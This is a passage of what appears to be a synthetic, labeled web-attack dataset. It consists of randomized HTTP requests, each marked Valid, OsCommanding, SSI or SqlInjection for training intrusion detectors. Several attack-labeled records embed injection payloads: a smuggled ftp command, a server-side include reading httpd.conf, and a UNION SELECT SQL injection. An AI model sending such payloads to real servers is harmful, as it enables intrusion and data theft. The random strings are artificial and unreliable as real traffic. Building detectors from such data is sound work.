Max-Forwards: 7
MIME-Version: 6.0
Pragma: l8ae='i'
Proxy-Authorization: Digest nonce
Authorization: Basic YWJvMnVUbzpvcm5ucnRveg==
Referer: http://hCeq.com/DbstAo.wav
TE: deflate
Trailer: Proxy-Authorization
User-Agent: aoqueemmoEgu
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: compress
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 413 www.Cr8n.js "i4qiee7ebn" "Thu, 05 Aug 04 06:10:01 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48310
Start - Id: 43181
class: OsCommanding
GET /0gi/iYX5m..gif?plctf0lai55=%5Cnuftp+++++-p+++++www.llelorenet.com+%2Fngne%2Fieisvetomear%2Fisrine%2Fte%2Fittr%2Fgeveis&olyneinpOlhsi7a=90752789&ritxfrronnop=dOktTsero%3BRNgenypbcs&ahantuE=arcpwccago-I%3Dt%27it&2NiT9E=p7uol1&aie6bABre1rnsr=086&nxetfooat=nD-esaqeS&lSuenLn1tien=3&nbhai=hqlsf6ksOcedrwa&wrdalprwr9=ift+ooiade HTTP/1.0
Host: www.eju7o.it
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=7426
Client-ip: 101.140.81.249
Cookie: oaaN=in7WIxkl;hhsegtfvrmtl=lee21wherer;5p=ay9|tArl;drx1Ntat=fechodh;ascoldyr8nRoeop=5nscript;mjfSh%:oaSsL2;necrakien5=612
Cookie2: $Version="74"
Date: Mon, 18 Oct 04 01:52:04 CET
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: uirrjt1@GfnEevribm.be
If-Modified-Since: Sun, 15 Oct 06 22:47:08 GMT
If-Unmodified-Since: Tue, 26 Jun 07 07:49:22 CET
If-Match: "BfGGItNNc4t4Bxjq"
If-None-Match: *
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 289
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: hnLn 4itor=97es0a
Authorization: onwph lG2cieBg=omtw
Range: 332370-1588,656-95
Referer: http://isa3.be/lr5rIbe.tar
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 5.9; sl-gt; rv:0.6.9) Gecko/39969110
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/8.1 www.ontw.css
Transfer-Encoding: tirawo
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 9831419059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43181
Start - Id: 22454
class: Valid
GET /eawroa/2_iyrC/oetntsA8helisyl/59EWm52-sYKKBUVBG/lUJol-CG3/rocl/ogxZVdjJoJeP/oP/zb7jAKvWGj2VdXou/ii.tiff?nNKpassthru=eI5&fojteblb=22377890&Vw.DHMqFR=r1fe&a8taaesd=717779&imgx0TnPG@7=etcudTt&hsceo6ebmiattdE=tanetcd7lb%3B&sb=9HGO.&eeAARg0iepPo=g7erp&mF=tcBq&3exgqeler5=kr1orspaxtermno&g4lwmmneuR=83934&RbtcmcB=iee9d HTTP/1.1
Host: www.atei6yt.uk:995
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 242.133.189.214
Cookie: 5lK4DR=wv_jg0ahd
Cookie2: $Version="83"
Date: Fri, 04 Nov 05 05:01:50 GMT
ETag: W/"AE4sLJfZANAqGj6x2IC8"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Tue, 08 Dec 09 03:03:05 CET
If-Unmodified-Since: Wed, 09 Feb 05 16:29:41 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Jun 08 11:10:25 GMT
Max-Forwards: 3351
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic dGdyZXpHaDpjYmRlNWFpbg==
Authorization: Digest opaque="Daidggoj"
Range: 457992-,02-
Referer: http://www.ey8ceI.uk/9eEtkrwE.wmn
TE: chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.3 (Windows; U; WinNT 8.2; ti-eg; rv:9.4.9) Gecko/06233251
UA-CPU: MIPS
UA-Disp: 4335,2091,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: Qnsh9/5.9 42.11.145.95:0, hnneSf/7.6 1.123.100.82
Transfer-Encoding: identity
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22454
Start - Id: 39502
class: SSI
GET /aFSmcl/ox/78OsgnC.htm?qeetciaodg6=eacoly7%281&soscuIt=w&uautoexecysPKJN1=inetzocR&lrdhnbelrilnogw=65&Et3rnzacodieutP=vdbt&zjh0sttc=t6LNRGTSnQVc&hnnAtet=nodeo&yinir=8620&dhep=ei8czGK3nY&pNKU=21456399 HTTP/1.1
Host: 77.11.98.19:80
Connection: close
Accept: application/*;q=0.8, text/xml
Accept-Charset: iso-8859-7, iso-8859-6;q=0.0
Accept-Encoding: <!-- #include    virtual="/etc/httpd/httpd.conf" -->
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 17.157.96.204
Cookie: q0etalkr=ga@A7GK;n4fe8ya=i;nbn2jnadwj4;ose=omArqjfje3;upTrqIs=94548411;eenucs0tizT=sJfCu@SQtn
Date: Fri, 13 Jul 07 05:52:31 CET
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Sat, 09 Oct 04 03:54:02 CET
If-Unmodified-Since: Thu, 27 Dec 07 20:27:16 CET
If-Match: "NZeBIhMyKWTlBIeZd3q"
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 6eesqI biis=qhv8oi65
Authorization: NTLM OElyZGhuTmFlck5laXlpNmlmMmt0ZTZtYUViZHhlQ3RpcERhYQ==
Referer: /bpd1ie/ijtIs/ydezuI/sibiid/iJsoe.avi
TE: trailers,deflate;q=0.7,trailers
Trailer: Expect
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 9.4; ie-bs; rv:8.7.8) Gecko/01561994
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
UA-Pixels: 296x5456
Via: HTTP/9.5 82.239.53.239:0, 8.9 251.218.108.166
Transfer-Encoding: bavrx
Warning: 903 11.205.255.14:699 "aie8fmms" "Sun, 25 Oct 09 02:11:26 CET"
X-Forwarded-For: 212.30.157.133
X-Serial-Number: 81323854011
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39502
Start - Id: 15461
class: Valid
GET /rrT6ons0eN/ehM08cJ4/aJexjKmL8/r0ttnhhetbweeemdhltt/fMDYQ/dasn2eodeelgatns/ipOjhGDTzrsMN@_F5/6_KorI3Thopt/wee/sk84nq7o.tiff?ntxki=rnlahez&ui7mntr=ax&sTEdncaoHqeBj=feeautoexec&peishrsAsixkb=88&ehmht=6559&gewsuEswuln=twaeh&g4euoihyi8c5=diveL8&Nnbc7dQ=%3FNg%2BaeaistF%3Fta&2e2=rohebsitw5&r1un3nhuehi=6816599684 HTTP/1.0
Host: www.tomen.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.7, compress;q=0.9
Accept-Language: rnlti-rna2o, o3kou-Eudeaa4u;q=0.5, jee-t5eso, cqbmh-lu, ih8-rlao
Cache-Control: max-age=1
Client-ip: 75.235.46.128
Cookie: zq.p=LiEx;taaEntnnqk=tsbQU6a;hUet=oevp6
Cookie2: $Version="41"
Date: Mon, 18 Jan 10 13:16:07 UTC
ETag: "lkPa0YBlehJC984nmD"
Expect: 100-continue
From: areaH@nEI8mdx.biz
If-Modified-Since: Sat, 13 Feb 10 12:10:17 GMT
If-Unmodified-Since: Fri, 17 Feb 06 21:48:56 UTC
If-Match: *
If-None-Match: *
If-Range: "mWCA3VUOXz4dHAep"
Max-Forwards: 0
MIME-Version: 0.8
Pragma: z='eia'
Proxy-Authorization: NTLM NWZ6b3Q2aWV0aEVOdGFhZ3Jhd2FlRWpFYXJlM2Vzd0VjZUE=
Authorization: ntaen fatgj=ensad
Range: -54263
Referer: http://www.tmhast.cz/nedeOr.cfm
TE: deflate
Trailer: Warning
User-Agent: eayzdsitRg6lfliunow
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1725x7516
Via: FTP/1.7 www.bnn7ye.jpg, ezseh/9.9 246.254.158.197:08458
Transfer-Encoding: deflate
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 569 www.Fu27pmk.js "2eoaar" "Thu, 15 May 08 10:27:48 GMT"
X-Forwarded-For: 10.6.38.7
X-Serial-Number: 83246160630295135066
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15461
Start - Id: 33348
class: Valid
PUT /rU.KBy_znBV5_LHv/cm8aaT/F9oUisQaccess_logUE/sE/eeaeiE0eo8uni8ji/aWYPGYfLn.846Vd/4sbixthecaSet/ieiaK_wticq.shtml? HTTP/1.0
Content-Length: 187
Content-Language: ohf
Content-Encoding: gzip
Content-Location: http://2a9mbd.de/ASceirC/5dfUizyi/rstaf89/1hlar/1wem5hg.nsf
Content-MD5: eGxzc05ySXF6b2x3YjNsUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Sep 04 18:10:27 GMT
Last-Modified: Sat, 15 Dec 07 19:04:07 GMT
Host: 141.18.61.210:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, iso-2022-jp;q=0.0
Accept-Encoding: 
Accept-Language: yea-fcbZ;q=0.4, tdq-h;q=0.7
Cache-Control: max-stale
Client-ip: 219.255.155.213
Cookie: ifssao=kDoTdt;lTNslhne=228497;qoptcSoeDnand=]wlobjectsInj;wtmesm=u;h8iOpscitet4=csuorriroler;uquileagts=6w
Cookie2: $Version="144"
Date: Wed, 01 Feb 06 14:29:32 CET
ETag: W/"ON51Dk_@v.I6b61AOv"
Expect: e3cuqbfd=77shnm;icoes=cwehe
From: Aeragl@tweisb5so.ch
If-Modified-Since: Tue, 17 Feb 09 13:48:27 GMT
If-Unmodified-Since: Fri, 09 Apr 10 17:57:51 GMT
If-Match: "Io6J4vTVU2fElnSU.4"
If-None-Match: "6SujQyKZayl63e2OgYM"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: euet eprhhwtr=g2dt
Authorization: Digest nonce
Range: 235525-99
Referer: /eohErna/hdI6ro/scpoa/ffii.html
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.2 (X11; U; SunOS sun4u 9.6; OR-ng; rv:2.9.2) Gecko/43940423
UA-CPU: MIPS
UA-Disp: 6397,158,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: 6.7 218.150.72.111:7, HTTP/8.7 159.61.218.58, HTTP/1.2 38.99.231.240
Transfer-Encoding: identity
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 744 1.172.173.169 "uuvt3lirsoi" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 93235551323019151899
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9Laarshibd08hf6=93566&otspt5asDi=IssottcOqa6un&o7h7e6oaap=trofo;soistyle&encewwctRpa5s=6yrohd&mYHiQ=cdocumentaahnrorxp_deo l&rVJx=oYgINNmrRg&eeeaerqrihn=tTjXIyRZx&ildmNe6orOiisu=lbemdpt

End - Id: 33348
Start - Id: 16021
class: Valid
GET /Tt03.msf?wheh3h=88764936&idl@bK.r16o=winnth%7C%27positiono&nverjdeiffaa=s%24hisaMh&PK3fa=4895850&asq3lrqncxej1a=228&esnne8ou=03480237 HTTP/1.1
Host: www.mnYn.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.149.33.159
Cookie: Iip4s76Jastece=Olocationludentwg)ezee@wef;tdIsrugieu=b62KuK9V0;hshttrco=68;venslxwD=frg;3eanlze3ckt=eFsrxelfnhmteR
Cookie2: $Version="932"
Date: Sun, 21 Dec 08 11:23:39 CET
ETag: "hD-iZHKYJ7r2eIn32"
Expect: 100-continue
From: ioDenuTw@Aree.gov
If-Modified-Since: Wed, 25 Aug 04 16:34:28 CET
If-Unmodified-Since: Sun, 05 Feb 06 07:58:32 GMT
If-Match: "NkdBX-pf_gK3qdsx"
If-None-Match: "2DP.QdeAlQMe1QUK@.Ri"
If-Range: "ZknCJn_hWMmHRilPHjVh"
Max-Forwards: 30
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM YTRhZWlucW50M2dlb010NmxzdGxoNHFsanBJY3dzeWVhVnR3ZG1hSHRzZU5lbHR0
Authorization: Basic ZWVubW9lZXQ6bWUyYW9z
Range: 120-88552
Referer: http://www.eexoh.org/1whamn5/iKPb/o3rm/uzNeedtt.gz
TE: chunked,trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 9.9; r3-ex; rv:2.3.7) Gecko/10484492
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: FTP/8.0 www.iohelY.jpg:4392, FTP/0.4 216.3.151.249:164, FTP/9.3 116.118.151.232
Transfer-Encoding: identity
Upgrade: pnhh/6.6, iweta/0.9, 8roie/6.1
Warning: 192 www.smdny5nu.gif "em7hryt" "Wed, 17 Mar 10 12:26:18 GMT"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16021
Start - Id: 13378
class: Valid
GET /ueYqr/sB7xT-/tTnuccsiksseroolpe/svrbecds/rU/eefetga5ri/1eNwPm3aS1n43tXvb29F.php3?9hioUruh=meiel&lrfyaR6=h8ccBJEn6&fYXXF=tuTH&lGihetSs1vT=3163&hut=yMoe&m1peChi=N2iqltAaeshi&tdmHtr6do=mSu%7C%27e&rdide=5e+hra&Rposition3JkFscript.n=oehhp&Ryselectlln93P=34513131&nl=ip1foerfusr%7CccTo&raondswotreb=3 HTTP/1.0
Host: www.dmpmiuSl.uk
Connection: dedr
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, compress;q=0.0, deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Thu, 18 Aug 05 02:20:40 CET
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: 100-continue
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Wed, 28 Feb 07 21:47:35 GMT
If-Unmodified-Since: Thu, 09 Nov 06 03:13:14 UTC
If-Match: *
If-None-Match: *
If-Range: "MHk4tpLHDfutExDvyW"
Max-Forwards: 140
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic eThuMzIwOm5hZWVlZA==
Range: 30-,-79267,97-361160
Referer: http://ieue2.org/saue/imds/2telug/efdteeem/3odeim.cfm
TE: trailers,chunked;q=0.3
Trailer: Warning
User-Agent: eervtA (yN@-qOXAo@; j4O3EUibpH; aaBPo6IHpL; o0AE2czq; ajHSrom)
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8753x0793
Via: 1.3 www.Ttegn.jpeg, HTTP/4.1 www.sehi2ils.jpg, HTTP/6.5 www.umrzlal.tiff
Transfer-Encoding: Teaut; ulel8r=aytmLeao
Upgrade: beend/1.7, tgea5/9.2, 4belk/7.6
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 32712386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13378
Start - Id: 12372
class: Valid
GET /lmhtup6rlwhnda/oYz1RPcRoLhoc6h/evNXr-LFSm/aQ/diopenxBpasswdd.aspx?lnikRooXb=zqEupsoeak&ol8Cjsfh6e=xp_au&tApsn7=4703487078&iesfrcatnss=nnaaee1i&lmfyimteti1ht=%5Ceotu7%26OhMS&hovYTs1elihue=heyacexf&eGC7Hgik@=at+&mxvCtbdu=qlHAd&6Wx2j=b+apen5&iz9ol=le&lnEtdqniv07anc1=sL6&a9oia8q=4922 HTTP/1.1
Host: www.ernScb.it
Connection: close
Accept: application/*
Accept-Charset: iso-8859-6, shift_jis;q=0.4, x-mac-greek, iso-8859-2, shift_jis;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 106.46.241.48
Cookie: nlole5=ad f)oy/&v;niteloc0ie0g4se=8142074153;kedheeby2=sZvjnfa57
Cookie2: $Version="226"
Date: Tue, 13 Mar 07 15:03:40 GMT
ETag: "-cR-WV4iaVsusrr.4"
Expect: 58eo=J2ehihen;ewaeiah=i5ci13a
From: t73o@ostb.com
If-Modified-Since: Fri, 31 Dec 04 17:32:24 CET
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: *
If-None-Match: "vixM5TLgsg8GXJC"
If-Range: "ith9PWCFho7SG@_Nsk"
Max-Forwards: 931
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: DuJm tcmeteLj=bonrctac
Authorization: 19Orw ee43=sMeyL
Range: -93802
Referer: /ad0rni.swf
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: t2oFwY0dTd http://www.iohN.cz
UA-CPU: 68000
UA-Disp: 1831,152,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8258x863
Via: HTTP/5.1 156.228.36.141, 0.2 www.stiie.css, soai/2.4 www.tdfon.htm
Transfer-Encoding: identity
Upgrade: cnml/5.7, shtng/2.0, aHtns/7.2, ylt/4.9
Warning: 155 www.Relra.js "wlpmsltmlaebo4e" "Wed, 06 Sep 06 04:06:20 CET"
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12372
Start - Id: 22443
class: Valid
GET /iaxSn3XHDx0btslne.cgi?ip2dreovs=77&uNGZlM=sIFqxKD&xtH5=hay&abem2are4mnoi=a_zL&V3tv7ni=vEvGxaakpile&geXQj=0&.UTc0=96887615&ttNtt96batmum=aideh7eefcro&iCeihl=Iteyqqi0cerjroNeep&sinaee3=ihCpF1-1mM&sv=h4onyo&etadfocst=ttP8Sops+aatHrewo%3E HTTP/1.1
Host: www.laeimedh.de:80
Connection: Erle
Accept: video/mpeg, application/*;q=0.8, audio/basic;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 242.133.189.214
Cookie: eMtoenoTusj=02;iuc9re=aCS8K1d
Cookie2: $Version="35"
Date: Wed, 23 Apr 08 06:51:07 UTC
ETag: "xa-zMNeKb3jW4Lg6"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Mon, 18 Feb 08 04:29:28 CET
If-Unmodified-Since: Fri, 16 Feb 07 16:50:34 GMT
If-Match: "qxNGUjt7SC9Dp4bRg"
If-None-Match: *
If-Range: *
Max-Forwards: 1163
MIME-Version: 6.3
Pragma: nnccdyht=coeheoto
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: Gxsl amLeYap=bseIIluD
Range: 6444-70796,874-
Referer: http://lsrnr.fr/nxps/Reoahaee/oyuH/eewtmne/shsrqrbd.mspx
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: Mozilla/5.8 (Windows; U; Win98 7.2; il-ke; rv:3.6.0) Gecko/36742759
UA-CPU: Sparc
UA-Disp: 8455,3550,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 112x1566
Via: 1.7 115.105.193.186, 9.4 www.blcY.jpg
Transfer-Encoding: identity
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22443
Start - Id: 18309
class: Valid
GET /group by2xpIo8g/cLvL-RM/eTHbtUqA4HC/uPmSGI3yyMMmGRPc7w2.gif?e1szmi5tEToOcn=ehnyruak8ud0r7l&Rs=3lKhy HTTP/1.1
Host: www.fnHhn.net
Connection: close
Accept: text/*;q=0.7, image/gif, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ftae-etat;q=0.9
Cache-Control: no-cache
Client-ip: 34.186.224.238
Cookie: 0iial=biN0T;of2s=iYZW0OMU;system.vjlz@Yqn=pgk8;yUliztqrote=h_kDqFaJR
Cookie2: $Version="8"
Date: Sat, 17 Apr 10 06:44:16 UTC
ETag: "fKZ8peuxgdq_2ugbR"
Expect: rvsav2=sltuna;ndynn
From: gstN@lnddoWhdmn.fr
If-Modified-Since: Thu, 15 Jun 06 18:05:53 GMT
If-Unmodified-Since: Wed, 28 Apr 10 21:20:49 UTC
If-Match: "fN2I1Y-Zpm1WvFijMDHW"
If-None-Match: "JbLHZ.FIdzc5-hp"
If-Range: Wed, 13 Feb 08 18:06:16 UTC
Max-Forwards: 0
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Digest algorithm=MD5
Range: 33-392,-2077,7-8592
Referer: http://www.n7cfr9n.be/17ntse7j/t7Qiavn4/rmGlqi/e1Eaoi/Oufn.sh
TE: gzip;q=0.2,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 4.9; eh-tg; rv:6.5.4) Gecko/03677903
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: gzip
Upgrade: tlt/9.6
Warning: 514 67.147.194.108 "eiekiaraEa6" "Fri, 07 Oct 05 14:36:56 GMT"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18309
Start - Id: 5288
class: Valid
POST /wd9@Zy@./dV6vRg5a30oe4Fxd/rml_bodyp3-_Smb/oeyd1s5hdleii/ejzi2tMm/dN6.js? HTTP/1.1
Content-Length: 143
Content-Language: dyg3
Content-Encoding: compress
Content-Location: http://www.ia7hA.org/e7pr.asmx
Content-MD5: ZWluYXN3bjhTck9xaU8yeA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Mar 05 20:49:44 UTC
Last-Modified: Tue, 09 Nov 04 19:06:00 GMT
Host: 44.121.74.17
Connection: close
Accept: text/*, audio/x-wav;q=0.0
Accept-Charset: cp-936;q=0.4, ks_c_5601-1987;q=0.0, euc-jp
Accept-Encoding: 
Accept-Language: fs0e4-toeecto4, Xc-asmsuet, hiet-ito;q=0.9, ataarm-aMel
Cache-Control: max-stale=69447
Client-ip: 116.171.50.94
Cookie: iecrH1nlne=tn?s0;phn=oIc4LJo5
Cookie2: $Version="82"
Date: Mon, 28 Feb 05 12:46:00 UTC
ETag: "hVxHsrYAQqM_e7KE28G"
Expect: nsasfns
From: rpfz@tmadFbssh.cz
If-Modified-Since: Fri, 08 May 09 08:08:38 GMT
If-Unmodified-Since: Fri, 25 Sep 09 10:10:22 CET
If-Match: "0EBsQ2n4aaNSkKf0F"
If-None-Match: *
If-Range: "JFbWL-4.gCNwC5MDHw"
Max-Forwards: 7
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: aghv eebTs=nisatc
Authorization: Basic aGV0bzpkYWltbw==
Range: 44-,39-,850121-
Referer: /tyH7nt/ooxnyn.php
TE: chunked
Trailer: If-Range
User-Agent: j48emX http://www.aa4idrr.com
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1146x7241
Via: 0.2 206.37.207.157:778
Transfer-Encoding: compress
Upgrade: ehpx5/0.0, arxncn/6.5, nwer/0.3, shn/9.2, otna/5.5
Warning: 956 243.103.215.103 "tcoisWLpTeabhdwa" "Fri, 30 Apr 04 10:44:05 GMT"
X-Forwarded-For: 86.174.5.96
X-Serial-Number: 04934320303935
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

XlaN=5384&esoztnrd=egWzmSd&thieonfe=2a< script fapositionmsrtmp;locationabetween&dAndhKtsC=Rrtewgeleyi95r&aeoT4on=a4WG&nnikohsdenrieht=7096

End - Id: 5288
Start - Id: 11037
class: Valid
GET /vODChD6O4aUWB/whoantrdAueayi9rys4/e@tmvu3ZqfEQnK-7LP/.mU/3-Bdm/rD9TNbb/pnhmjtytltmsnh.png?qltimWj=dpie5rat0ll HTTP/1.1
Host: www.jieT.uk
Connection: close
Accept: text/*, video/*
Accept-Charset: x-mac-arabic;q=0.1, euc-cn, iso-8859-3;q=0.9, iso-8859-15
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=3451
Client-ip: 247.152.254.236
Cookie: rhmr=DoTr'fsib7x
Cookie2: $Version="121"
Date: Sun, 13 Apr 08 07:20:08 CET
ETag: W/"uVRA5BFTZj4zzWuk4"
Expect: 100-continue
From: szi40en@pbaUtnm9st.st
If-Modified-Since: Tue, 28 Mar 06 06:33:50 CET
If-Unmodified-Since: Wed, 24 Mar 10 16:25:47 UTC
If-Match: *
If-None-Match: "5jjNgGFlU4xb.JRcJDl"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM bnkwYW9mZ3JyaG9vZWZkcnBubG9lZ3NzdnhyemRiZmFyQmN1aG1uaXNrN3d0b2k=
Authorization: easieg degguh=eldpligu
Range: 61-
Referer: /alei/8eAs3uu/relr/samnlc/N7Ybgsw.jsp
TE: trailers,deflate
Trailer: Range
User-Agent: Mozilla/2.3 (compatible; 0ad1seqiai; Windows NT; ekkHa)
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 314x175
Via: 5.5 251.251.108.175:55434, edoi9e/0.3 226.195.0.166
Transfer-Encoding: gzip
Upgrade: s42/1.2, lyc/7.6, teyhNr/3.2, i6qn/3.3
Warning: 724 83.173.237.100 "oclmtc" "Thu, 06 Nov 08 03:34:24 GMT"
X-Forwarded-For: 3.46.104.106
X-Serial-Number: 86044035
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11037
Start - Id: 41693
class: SqlInjection
GET /femerahsogoszrc/zRuZs0acceptclpassthru/ah@ZsIkIaxX3LsGE4c/n9rixtyithhftuehse/40UKDQUggt4QhZ/7MXyj7xqnCadminK3Op/f4KqCvEa99/tah8/m9EKjF77Bd/sQ.exe?3ouqra0hoenkshh=o_pKvO&strne5oy=lElikewherem&aiRhns=06426&.1vHF=%27++++UNION+++++++++++ALL++++++SELECT+++nHfsreeh++++FROM++ntdin++WHERE+%27%27+++%3D+++%27&dghlocationd9IA=uftK35&uSRnpgPesirljpe=215&u1ace=7tlvgeEterhee&admin10aztDMUAg1=2866733 HTTP/1.0
Host: www.hE1yjt.gov
Connection: keep-alive
Accept: text/plain;q=0.3
Accept-Charset: x-mac-ce;q=0.7, cp-950;q=0.0
Accept-Encoding: *
Accept-Language: aj-ehd, ih-soat;q=0.5, onrneswi-ah6o;q=0.1
Cache-Control: no-transform
Client-ip: 173.78.32.144
Cookie: hr=soeuoEyen;edimeTs=vbscriptuO
Cookie2: $Version="67"
Date: Sun, 23 Oct 05 05:08:44 UTC
ETag: "ShOwSg3eRa0frjO_pn"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sat, 01 Sep 07 11:30:45 CET
If-Unmodified-Since: Sun, 25 Apr 10 23:19:21 GMT
If-Match: "xoPSHlY2Od6._xoDTKi"
If-None-Match: *
If-Range: *
Max-Forwards: 2613
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="orot6"
Authorization: Aato8 oEoat=n1i8daro
Range: 271923-
